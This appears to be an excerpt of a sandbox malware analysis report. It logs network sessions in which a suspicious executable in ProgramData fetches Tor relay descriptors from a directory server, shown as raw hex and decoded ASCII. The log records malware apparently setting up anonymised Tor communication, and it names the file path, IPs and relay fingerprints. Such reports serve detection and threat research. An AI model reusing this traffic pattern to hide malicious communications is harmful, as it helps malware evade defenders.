4a 62 77 6c 39 59 6a 6b 30 48 66 7a 42 37 6a 6a 63 67 59 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 6d 61 73 74 65 72 2d 6b 65 79 2d 65 64 32 35 35 31 39 20 4d 69 69 76 49 61 36 56 42 59 77 6c 39 31 56 36 5a 75 2f 62 37 38 45 61 45 41 77 50 5a 53 30 2b 68 6d 63 4c 69 65 69 4c 71 64 38 0a 6f 72 2d 61 64 64 72 65 73 73 20 5b 32 61 30 33 3a 34 30 30 30 3a 36 3a 66 38 61 39 3a 63 34 65 37 3a 34 64 66 66 3a 66 65 63 35 3a 31 65 35 65 5d 3a 39 31 30 30 0a 70 6c 61 74 66 6f 72 6d 20 54 6f 72 20 30 2e 34 2e 37 2e 31 33 20 6f 6e 20 4c 69 6e 75 78 0a 70 72 6f 74 6f 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d 32 20 4c 69 6e 6b 3d 31 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 31 2c 33 20 4d 69 63 72 6f 64 65 73 63 3d 31 2d 32 20 50 61 64 64 69 6e 67 3d 32 20 52 65 6c 61 79 3d 31 2d 34 0a 70 75 62 6c 69 73 68 65 64 20 32 30 32 33 2d 30 32 2d 30 38 20 31 33 3a 34 34 3a 30 35 0a 66 69 6e 67 65 72 70 72 69 6e 74 20 35 37 35 36 20 44 39 43 34 20 30 33 44 38 20 39 42 37 39 20 41 46 45 36 20 39 44 35 30 20 42 42 30 36 20 38 32 42 41 20 33 31 38 33 20 31 39 46 42 0a 75 70 74 69 6d 65 20 33 30 32 35 37 38 0a 62 61 6e 64 77 69 64 74 68 20 31 30 37 33 37 34 31 38 32 34 20 31 30 37 33 37 34 31 38 32 34 20 36 31 37 38 38 37 36 0a 65 78 74 72 61 2d 69 6e 66 6f 2d 64 69 67 65 73 74 20 32 46 39 31 30 44 37 46 44 35 42 31 45 32 30 37 30 45 45 33 39 32 33 30 41 36 34 41 36 43 30 41 35 31 36 38 45 36 34 36 20 63 31 6a 5a 73 61 36 55 6c 74 34 6b 79 64 37 58 4f 74 74 59 6f 56 79 64 6a 58 4d 38 4c 68 58 35 37 4e 64 41 44 76 69 58 38 67 6f 0a 6f 6e 69 6f 6e 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4c 2b 52 6a 36 33 78 4f 41 34 7a 64 53 49 64 4c 45 4b 72 58 46 76 56 37 6c 49 65 6c 43 4e 62 6d 2b 4a 71 4f 30 5a 63 4a 48 4a 63 7a 34 6c 66 42 56 38 6a 52 64 73 68 0a 53 57 51 4a 45 56 77 6a 6d 63 74 41 63 4b 65 64 2f 42 73 4e 70 72 30 55 71 38 47 6e 65 64 6c 2f 76 7a 70 33 32 42 2f 5a 31 52 2b 6f 6b 38 42 70 54 64 69 53 4f 4c 33 61 70 66 78 6e 45 6a 38 37 0a 5a 4a 45 33 50 2f 52 42 4e 38 41 43 7a 59 2f 63 79 4f 6b 43 67 2b 31 46 4d 47 6c 74 69 39 6b 6f 44 46 43 4c 4e 56 55 32 44 50 4a 39 32 5a 59 31 66 32 35 6e 41 67 4d 42 41 41 45 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 73 69 67
                      Data Ascii: router Quetzalcoatl 188.68.58.131 9100 0 0identity-ed25519-----BEGIN ED25519 CERT-----AQQAByEwAdAdn8qpohm4HxEA53R+etp+hiClM6CegfU9eIH/nhGIAQAgBAAyKK8hrpUFjCX3VXpm79vvwRoQDA9lLT6GZwuJ6Iup33Y7omXpyfmqQpqQ8p0M5ZvZE3fJ5ActztJy6KWulC5REC8lsgbsz9LCsQsFUK32tfAbJbwl9Yjk0HfzB7jjcgY=-----END ED25519 CERT-----master-key-ed25519 MiivIa6VBYwl91V6Zu/b78EaEAwPZS0+hmcLieiLqd8or-address [2a03:4000:6:f8a9:c4e7:4dff:fec5:1e5e]:9100platform Tor 0.4.7.13 on Linuxproto Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4published 2023-02-08 13:44:05fingerprint 5756 D9C4 03D8 9B79 AFE6 9D50 BB06 82BA 3183 19FBuptime 302578bandwidth 1073741824 1073741824 6178876extra-info-digest 2F910D7FD5B1E2070EE39230A64A6C0A5168E646 c1jZsa6Ult4kyd7XOttYoVydjXM8LhX57NdADviX8goonion-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBAL+Rj63xOA4zdSIdLEKrXFvV7lIelCNbm+JqO0ZcJHJcz4lfBV8jRdshSWQJEVwjmctAcKed/BsNpr0Uq8Gnedl/vzp32B/Z1R+ok8BpTdiSOL3apfxnEj87ZJE3P/RBN8ACzY/cyOkCg+1FMGlti9koDFCLNVU2DPJ92ZY1f25nAgMBAAE=-----END RSA PUBLIC KEY-----sig


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      15192.168.2.54972424.53.51.1449030C:\ProgramData\dtkttiw\llfujo.exe
                      TimestampkBytes transferredDirectionData
                      Feb 9, 2023 01:01:18.957381010 CET2758OUTGET /tor/server/fp/7a72da3127be09a802255a600cd0b4e97785f5fd HTTP/1.0
                      Host: 24.53.51.144
                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                      Connection: close
                      Feb 9, 2023 01:01:19.713805914 CET2759INHTTP/1.0 200 OK
                      Date: Thu, 09 Feb 2023 00:01:19 GMT
                      Content-Type: text/plain
                      X-Your-Address-Is: 84.17.52.13
                      Content-Encoding: identity
                      Expires: Sat, 11 Feb 2023 00:01:19 GMT
                      Data Raw: 72 6f 75 74 65 72 20 72 65 6c 61 79 6f 6e 31 31 37 33 20 31 38 35 2e 32 32 30 2e 31 30 31 2e 31 37 33 20 31 31 31 37 33 20 30 20 30 0a 69 64 65 6e 74 69 74 79 2d 65 64 32 35 35 31 39 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 41 51 51 41 42 78 71 69 41 65 6d 66 33 75 62 51 54 33 38 38 76 52 30 4c 68 38 62 47 44 73 38 6e 63 76 54 30 46 78 39 34 66 66 62 31 67 6f 79 7a 39 5a 7a 73 41 51 41 67 42 41 43 4d 77 51 76 74 0a 33 6d 69 31 78 6c 73 65 4b 68 68 4d 35 77 43 4d 6f 52 4a 42 78 76 6f 48 65 76 70 4f 53 61 58 33 6e 71 2f 59 70 47 4e 78 75 56 33 44 79 41 76 67 30 57 73 35 41 5a 44 6f 77 52 69 5a 65 75 51 64 0a 37 6b 38 2b 6d 4b 36 6d 31 56 42 66 2f 7a 56 38 54 72 32 6b 58 5a 42 43 6c 4b 6b 57 54 4b 2f 63 33 6f 30 78 31 41 52 33 4d 51 52 68 2b 57 65 69 61 72 32 72 31 62 55 36 79 67 4d 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 6d 61 73 74 65 72 2d 6b 65 79 2d 65 64 32 35 35 31 39 20 6a 4d 45 4c 37 64 35 6f 74 63 5a 62 48 69 6f 59 54 4f 63 41 6a 4b 45 53 51 63 62 36 42 33 72 36 54 6b 6d 6c 39 35 36 76 32 4b 51 0a 6f 72 2d 61 64 64 72 65 73 73 20 5b 32 61 30 62 3a 66 34 63 32 3a 31 3a 3a 31 37 33 5d 3a 31 31 31 37 33 0a 70 6c 61 74 66 6f 72 6d 20 54 6f 72 20 30 2e 34 2e 37 2e 31 33 20 6f 6e 20 4c 69 6e 75 78 0a 70 72 6f 74 6f 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d 32 20 4c 69 6e 6b 3d 31 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 31 2c 33 20 4d 69 63 72 6f 64 65 73 63 3d 31 2d 32 20 50 61 64 64 69 6e 67 3d 32 20 52 65 6c 61 79 3d 31 2d 34 0a 70 75 62 6c 69 73 68 65 64 20 32 30 32 33 2d 30 32 2d 30 38 20 31 37 3a 34 35 3a 34 38 0a 66 69 6e 67 65 72 70 72 69 6e 74 20 37 41 37 32 20 44 41 33 31 20 32 37 42 45 20 30 39 41 38 20 30 32 32 35 20 35 41 36 30 20 30 43 44 30 20 42 34 45 39 20 37 37 38 35 20 46 35 46 44 0a 75 70 74 69 6d 65 20 31 30 38 30 31 0a 62 61 6e 64 77 69 64 74 68 20 31 30 37 33 37 34 31 38 32 34 20 31 30 37 33 37 34 31 38 32 34 20 31 35 35 30 34 33 38 34 0a 65 78 74 72 61 2d 69 6e 66 6f 2d 64 69 67 65 73 74 20 30 32 39 37 44 37 30 43 36 37 35 34 39 37 36 38 30 39 46 30 39 34 41 30 33 36 45 30 45 37 42 44 33 30 45 43 30 45 45 46 20 34 57 4d 51 6e 34 76 62 42 4e 66 45 46 4f 39 31 32 31 53 79 33 56 6a 79 2b 6c 4a 7a 69 4b 32 6e 6c 6e 4d 67 67 2f 31 6a 77 74 38 0a 6f 6e 69 6f 6e 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4b 7a 4f 31 34 63 76 52 5a 52 4f 32 49 4e 57 67 54 57 70 6a 52 42 4e 64 52 37 66 76 71 45 36 6e 56 50 6e 73 43 32 46 42 52 4f 34 38 70 2f 79 52 7a 68 66 4d 51 43 57 0a 5a 6f 64 2f 54 76 77 76 63 33 70 59 32 70 66 4f 42 75 6a 73 32 38 6c 4c 51 66 32 57 65 4b 31 32 74 46 6f 4a 46 75 73 4b 37 76 32 41 42 61 76 2b 6d 39 31 2b 49 51 61 6b 51 66 78 6c 41 64 4d 66 0a 77 74 62 42 42 70 64 4f 39 62 4e 71 2b 47 6c 69 73 55 7a 43 36 51 58 4d 62 38 6f 71 6f 46 33 77 45 2b 4f 50 76 70 59 56 47 2f 4b 56 55 4d 6f 7a 79 76 75 48 41 67 4d 42 41 41 45 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 73 69 67 6e 69 6e 67 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47
                      Data Ascii: router relayon1173 185.220.101.173 11173 0 0identity-ed25519-----BEGIN ED25519 CERT-----AQQABxqiAemf3ubQT388vR0Lh8bGDs8ncvT0Fx94ffb1goyz9ZzsAQAgBACMwQvt3mi1xlseKhhM5wCMoRJBxvoHevpOSaX3nq/YpGNxuV3DyAvg0Ws5AZDowRiZeuQd7k8+mK6m1VBf/zV8Tr2kXZBClKkWTK/c3o0x1AR3MQRh+Weiar2r1bU6ygM=-----END ED25519 CERT-----master-key-ed25519 jMEL7d5otcZbHioYTOcAjKESQcb6B3r6Tkml956v2KQor-address [2a0b:f4c2:1::173]:11173platform Tor 0.4.7.13 on Linuxproto Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4published 2023-02-08 17:45:48fingerprint 7A72 DA31 27BE 09A8 0225 5A60 0CD0 B4E9 7785 F5FDuptime 10801bandwidth 1073741824 1073741824 15504384extra-info-digest 0297D70C6754976809F094A036E0E7BD30EC0EEF 4WMQn4vbBNfEFO9121Sy3Vjy+lJziK2nlnMgg/1jwt8onion-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBAKzO14cvRZRO2INWgTWpjRBNdR7fvqE6nVPnsC2FBRO48p/yRzhfMQCWZod/Tvwvc3pY2pfOBujs28lLQf2WeK12tFoJFusK7v2ABav+m91+IQakQfxlAdMfwtbBBpdO9bNq+GlisUzC6QXMb8oqoF3wE+OPvpYVG/KVUMozyvuHAgMBAAE=-----END RSA PUBLIC KEY-----signing-key-----BEG


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      16192.168.2.54972524.53.51.1449030C:\ProgramData\dtkttiw\llfujo.exe
                      TimestampkBytes transferredDirectionData
                      Feb 9, 2023 01:01:19.945561886 CET2768OUTGET /tor/server/fp/1efbaccd28a07fd6ad7aa6f1293177d71397e918 HTTP/1.0
                      Host: 24.53.51.144
                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                      Connection: close
                      Feb 9, 2023 01:01:20.670588970 CET2769INHTTP/1.0 200 OK
                      Date: Thu, 09 Feb 2023 00:01:20 GMT
                      Content-Type: text/plain
                      X-Your-Address-Is: 84.17.52.13
                      Content-Encoding: identity
                      Expires: Sat, 11 Feb 2023 00:01:20 GMT
                      Data Raw: 72 6f 75 74 65 72 20 63 62 31 38 32 30 20 31 34 34 2e 37 36 2e 33 2e 31 38 32 20 39 30 39 30 20 30 20 30 0a 69 64 65 6e 74 69 74 79 2d 65 64 32 35 35 31 39 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 41 51 51 41 42 78 76 50 41 53 38 52 65 36 58 31 53 65 66 4a 64 48 42 64 4d 53 63 62 32 6d 74 57 46 63 36 74 75 6e 46 49 72 4b 63 4d 54 54 6c 57 69 2f 49 46 41 51 41 67 42 41 43 6b 51 4b 35 4e 0a 55 49 2f 69 6a 4c 2f 45 37 34 68 66 56 37 6e 34 6f 38 30 6b 41 44 6c 69 47 66 4b 55 30 5a 57 32 79 34 38 4d 65 6b 53 48 6a 43 75 48 33 74 6f 69 5a 56 48 42 6c 34 4a 66 6b 6a 50 67 7a 68 76 51 0a 32 6d 72 67 30 41 6a 42 67 4c 33 76 69 64 33 53 72 54 71 47 75 72 46 46 6f 5a 2f 2b 58 35 75 37 64 56 70 49 44 43 61 31 30 35 4b 6f 78 6f 38 68 36 73 2b 5a 6c 67 63 35 4c 67 30 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 6d 61 73 74 65 72 2d 6b 65 79 2d 65 64 32 35 35 31 39 20 70 45 43 75 54 56 43 50 34 6f 79 2f 78 4f 2b 49 58 31 65 35 2b 4b 50 4e 4a 41 41 35 59 68 6e 79 6c 4e 47 56 74 73 75 50 44 48 6f 0a 6f 72 2d 61 64 64 72 65 73 73 20 5b 32 61 30 31 3a 34 66 38 3a 31 39 30 3a 37 33 38 35 3a 3a 32 5d 3a 39 30 39 30 0a 70 6c 61 74 66 6f 72 6d 20 54 6f 72 20 30 2e 34 2e 37 2e 31 30 20 6f 6e 20 4c 69 6e 75 78 0a 70 72 6f 74 6f 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d 32 20 4c 69 6e 6b 3d 31 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 31 2c 33 20 4d 69 63 72 6f 64 65 73 63 3d 31 2d 32 20 50 61 64 64 69 6e 67 3d 32 20 52 65 6c 61 79 3d 31 2d 34 0a 70 75 62 6c 69 73 68 65 64 20 32 30 32 33 2d 30 32 2d 30 38 20 31 38 3a 35 37 3a 32 31 0a 66 69 6e 67 65 72 70 72 69 6e 74 20 31 45 46 42 20 41 43 43 44 20 32 38 41 30 20 37 46 44 36 20 41 44 37 41 20 41 36 46 31 20 32 39 33 31 20 37 37 44 37 20 31 33 39 37 20 45 39 31 38 0a 75 70 74 69 6d 65 20 31 34 33 36 31 30 37 33 0a 62 61 6e 64 77 69 64 74 68 20 31 30 37 33 37 34 31 38 32 34 20 31 30 37 33 37 34 31 38 32 34 20 34 31 30 33 33 39 38 30 0a 65 78 74 72 61 2d 69 6e 66 6f 2d 64 69 67 65 73 74 20 30 35 31 45 38 32 31 35 34 35 45 44 34 38 38 41 31 36 41 34 37 31 37 35 34 46 44 45 42 32 44 46 41 41 33 46 34 45 38 42 20 54 4a 6b 44 53 4b 36 4e 4b 55 6a 73 45 5a 5a 58 38 2b 35 39 54 41 2f 4a 4d 78 2f 74 73 50 72 76 56 68 54 2b 31 48 66 51 6d 7a 30 0a 6f 6e 69 6f 6e 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4c 6b 44 4c 4a 57 4a 35 76 61 77 44 6e 67 59 69 34 46 45 61 6f 70 43 45 62 67 2b 35 77 75 41 74 56 59 4c 59 31 57 41 6d 71 55 4f 4e 2f 38 68 42 42 57 72 41 75 45 46 0a 50 2f 38 70 75 38 61 31 75 39 2f 42 52 31 50 58 46 57 6b 75 39 75 30 36 39 50 37 76 75 34 62 4d 45 57 35 49 69 6f 4a 43 45 37 39 49 5a 41 6c 4b 58 44 56 61 6a 49 61 7a 4e 51 30 35 36 6b 54 33 0a 42 37 39 57 65 6c 52 35 6e 52 7a 62 51 2f 52 68 31 37 50 47 61 47 49 68 76 59 4c 37 5a 68 2b 6b 58 2b 33 45 32 64 41 44 4d 48 2b 69 61 6a 6f 43 57 66 62 50 41 67 4d 42 41 41 45 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 73 69 67 6e 69 6e 67 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20
                      Data Ascii: router cb1820 144.76.3.182 9090 0 0identity-ed25519-----BEGIN ED25519 CERT-----AQQABxvPAS8Re6X1SefJdHBdMScb2mtWFc6tunFIrKcMTTlWi/IFAQAgBACkQK5NUI/ijL/E74hfV7n4o80kADliGfKU0ZW2y48MekSHjCuH3toiZVHBl4JfkjPgzhvQ2mrg0AjBgL3vid3SrTqGurFFoZ/+X5u7dVpIDCa105Koxo8h6s+Zlgc5Lg0=-----END ED25519 CERT-----master-key-ed25519 pECuTVCP4oy/xO+IX1e5+KPNJAA5YhnylNGVtsuPDHoor-address [2a01:4f8:190:7385::2]:9090platform Tor 0.4.7.10 on Linuxproto Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4published 2023-02-08 18:57:21fingerprint 1EFB ACCD 28A0 7FD6 AD7A A6F1 2931 77D7 1397 E918uptime 14361073bandwidth 1073741824 1073741824 41033980extra-info-digest 051E821545ED488A16A471754FDEB2DFAA3F4E8B TJkDSK6NKUjsEZZX8+59TA/JMx/tsPrvVhT+1HfQmz0onion-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBALkDLJWJ5vawDngYi4FEaopCEbg+5wuAtVYLY1WAmqUON/8hBBWrAuEFP/8pu8a1u9/BR1PXFWku9u069P7vu4bMEW5IioJCE79IZAlKXDVajIazNQ056kT3B79WelR5nRzbQ/Rh17PGaGIhvYL7Zh+kX+3E2dADMH+iajoCWfbPAgMBAAE=-----END RSA PUBLIC KEY-----signing-key-----BEGIN


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      17192.168.2.54972624.53.51.1449030C:\ProgramData\dtkttiw\llfujo.exe
                      TimestampkBytes transferredDirectionData
                      Feb 9, 2023 01:01:21.038620949 CET2776OUTGET /tor/server/fp/7a72da3127be09a802255a600cd0b4e97785f5fd HTTP/1.0
                      Host: 24.53.51.144
                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                      Connection: close
                      Feb 9, 2023 01:01:22.329142094 CET2777INHTTP/1.0 200 OK
                      Date: Thu, 09 Feb 2023 00:01:22 GMT
                      Content-Type: text/plain
                      X-Your-Address-Is: 84.17.52.13
                      Content-Encoding: identity
                      Expires: Sat, 11 Feb 2023 00:01:22 GMT
                      Data Raw: 72 6f 75 74 65 72 20 72 65 6c 61 79 6f 6e 31 31 37 33 20 31 38 35 2e 32 32 30 2e 31 30 31 2e 31 37 33 20 31 31 31 37 33 20 30 20 30 0a 69 64 65 6e 74 69 74 79 2d 65 64 32 35 35 31 39 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 41 51 51 41 42 78 71 69 41 65 6d 66 33 75 62 51 54 33 38 38 76 52 30 4c 68 38 62 47 44 73 38 6e 63 76 54 30 46 78 39 34 66 66 62 31 67 6f 79 7a 39 5a 7a 73 41 51 41 67 42 41 43 4d 77 51 76 74 0a 33 6d 69 31 78 6c 73 65 4b 68 68 4d 35 77 43 4d 6f 52 4a 42 78 76 6f 48 65 76 70 4f 53 61 58 33 6e 71 2f 59 70 47 4e 78 75 56 33 44 79 41 76 67 30 57 73 35 41 5a 44 6f 77 52 69 5a 65 75 51 64 0a 37 6b 38 2b 6d 4b 36 6d 31 56 42 66 2f 7a 56 38 54 72 32 6b 58 5a 42 43 6c 4b 6b 57 54 4b 2f 63 33 6f 30 78 31 41 52 33 4d 51 52 68 2b 57 65 69 61 72 32 72 31 62 55 36 79 67 4d 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 6d 61 73 74 65 72 2d 6b 65 79 2d 65 64 32 35 35 31 39 20 6a 4d 45 4c 37 64 35 6f 74 63 5a 62 48 69 6f 59 54 4f 63 41 6a 4b 45 53 51 63 62 36 42 33 72 36 54 6b 6d 6c 39 35 36 76 32 4b 51 0a 6f 72 2d 61 64 64 72 65 73 73 20 5b 32 61 30 62 3a 66 34 63 32 3a 31 3a 3a 31 37 33 5d 3a 31 31 31 37 33 0a 70 6c 61 74 66 6f 72 6d 20 54 6f 72 20 30 2e 34 2e 37 2e 31 33 20 6f 6e 20 4c 69 6e 75 78 0a 70 72 6f 74 6f 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d 32 20 4c 69 6e 6b 3d 31 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 31 2c 33 20 4d 69 63 72 6f 64 65 73 63 3d 31 2d 32 20 50 61 64 64 69 6e 67 3d 32 20 52 65 6c 61 79 3d 31 2d 34 0a 70 75 62 6c 69 73 68 65 64 20 32 30 32 33 2d 30 32 2d 30 38 20 31 37 3a 34 35 3a 34 38 0a 66 69 6e 67 65 72 70 72 69 6e 74 20 37 41 37 32 20 44 41 33 31 20 32 37 42 45 20 30 39 41 38 20 30 32 32 35 20 35 41 36 30 20 30 43 44 30 20 42 34 45 39 20 37 37 38 35 20 46 35 46 44 0a 75 70 74 69 6d 65 20 31 30 38 30 31 0a 62 61 6e 64 77 69 64 74 68 20 31 30 37 33 37 34 31 38 32 34 20 31 30 37 33 37 34 31 38 32 34 20 31 35 35 30 34 33 38 34 0a 65 78 74 72 61 2d 69 6e 66 6f 2d 64 69 67 65 73 74 20 30 32 39 37 44 37 30 43 36 37 35 34 39 37 36 38 30 39 46 30 39 34 41 30 33 36 45 30 45 37 42 44 33 30 45 43 30 45 45 46 20 34 57 4d 51 6e 34 76 62 42 4e 66 45 46 4f 39 31 32 31 53 79 33 56 6a 79 2b 6c 4a 7a 69 4b 32 6e 6c 6e 4d 67 67 2f 31 6a 77 74 38 0a 6f 6e 69 6f 6e 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4b 7a 4f 31 34 63 76 52 5a 52 4f 32 49 4e 57 67 54 57 70 6a 52 42 4e 64 52 37 66 76 71 45 36 6e 56 50 6e 73 43 32 46 42 52 4f 34 38 70 2f 79 52 7a 68 66 4d 51 43 57 0a 5a 6f 64 2f 54 76 77 76 63 33 70 59 32 70 66 4f 42 75 6a 73 32 38 6c 4c 51 66 32 57 65 4b 31 32 74 46 6f 4a 46 75 73 4b 37 76 32 41 42 61 76 2b 6d 39 31 2b 49 51 61 6b 51 66 78 6c 41 64 4d 66 0a 77 74 62 42 42 70 64 4f 39 62 4e 71 2b 47 6c 69 73 55 7a 43 36 51 58 4d 62 38 6f 71 6f 46 33 77 45 2b 4f 50 76 70 59 56 47 2f 4b 56 55 4d 6f 7a 79 76 75 48 41 67 4d 42 41 41 45 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 73 69 67 6e 69 6e 67 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47
                      Data Ascii: router relayon1173 185.220.101.173 11173 0 0identity-ed25519-----BEGIN ED25519 CERT-----AQQABxqiAemf3ubQT388vR0Lh8bGDs8ncvT0Fx94ffb1goyz9ZzsAQAgBACMwQvt3mi1xlseKhhM5wCMoRJBxvoHevpOSaX3nq/YpGNxuV3DyAvg0Ws5AZDowRiZeuQd7k8+mK6m1VBf/zV8Tr2kXZBClKkWTK/c3o0x1AR3MQRh+Weiar2r1bU6ygM=-----END ED25519 CERT-----master-key-ed25519 jMEL7d5otcZbHioYTOcAjKESQcb6B3r6Tkml956v2KQor-address [2a0b:f4c2:1::173]:11173platform Tor 0.4.7.13 on Linuxproto Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4published 2023-02-08 17:45:48fingerprint 7A72 DA31 27BE 09A8 0225 5A60 0CD0 B4E9 7785 F5FDuptime 10801bandwidth 1073741824 1073741824 15504384extra-info-digest 0297D70C6754976809F094A036E0E7BD30EC0EEF 4WMQn4vbBNfEFO9121Sy3Vjy+lJziK2nlnMgg/1jwt8onion-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBAKzO14cvRZRO2INWgTWpjRBNdR7fvqE6nVPnsC2FBRO48p/yRzhfMQCWZod/Tvwvc3pY2pfOBujs28lLQf2WeK12tFoJFusK7v2ABav+m91+IQakQfxlAdMfwtbBBpdO9bNq+GlisUzC6QXMb8oqoF3wE+OPvpYVG/KVUMozyvuHAgMBAAE=-----END RSA PUBLIC KEY-----signing-key-----BEG


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      18192.168.2.54972724.53.51.1449030C:\ProgramData\dtkttiw\llfujo.exe
                      TimestampkBytes transferredDirectionData
                      Feb 9, 2023 01:01:22.539560080 CET2786OUTGET /tor/server/fp/1eff2704d19bf45305bbcca53e2b59a3d17a6ee3 HTTP/1.0
                      Host: 24.53.51.144
                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                      Connection: close
                      Feb 9, 2023 01:01:23.610373020 CET2787INHTTP/1.0 200 OK
                      Date: Thu, 09 Feb 2023 00:01:23 GMT
                      Content-Type: text/plain
                      X-Your-Address-Is: 84.17.52.13
                      Content-Encoding: identity
                      Expires: Sat, 11 Feb 2023 00:01:23 GMT
                      Data Raw: 72 6f 75 74 65 72 20 53 65 70 69 69 64 61 65 20 31 37 32 2e 30 2e 34 37 2e 37 38 20 39 30 30 31 20 30 20 30 0a 69 64 65 6e 74 69 74 79 2d 65 64 32 35 35 31 39 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 41 51 51 41 42 78 74 6c 41 52 57 35 2f 76 36 52 4a 78 32 4d 4d 52 74 30 74 50 32 64 63 62 68 77 4a 65 5a 6e 42 69 36 61 2f 70 73 33 6e 35 57 4a 5a 53 32 31 41 51 41 67 42 41 42 39 41 59 61 36 0a 65 47 7a 39 68 4d 53 57 66 64 73 68 41 58 62 4f 2f 6e 59 37 7a 72 63 34 7a 4c 77 45 52 4c 67 4b 46 77 75 4a 79 54 4a 59 6a 67 4d 4c 66 76 33 41 61 64 4e 38 6d 77 4b 79 4c 52 47 5a 34 73 71 45 0a 57 6a 74 2b 5a 33 6d 2b 50 35 32 48 54 2b 55 64 4d 68 50 4c 43 43 52 64 58 71 4e 74 61 6e 62 2b 34 5a 4e 34 35 4d 6f 62 49 4c 72 38 4f 44 34 58 42 77 70 66 35 47 32 46 51 67 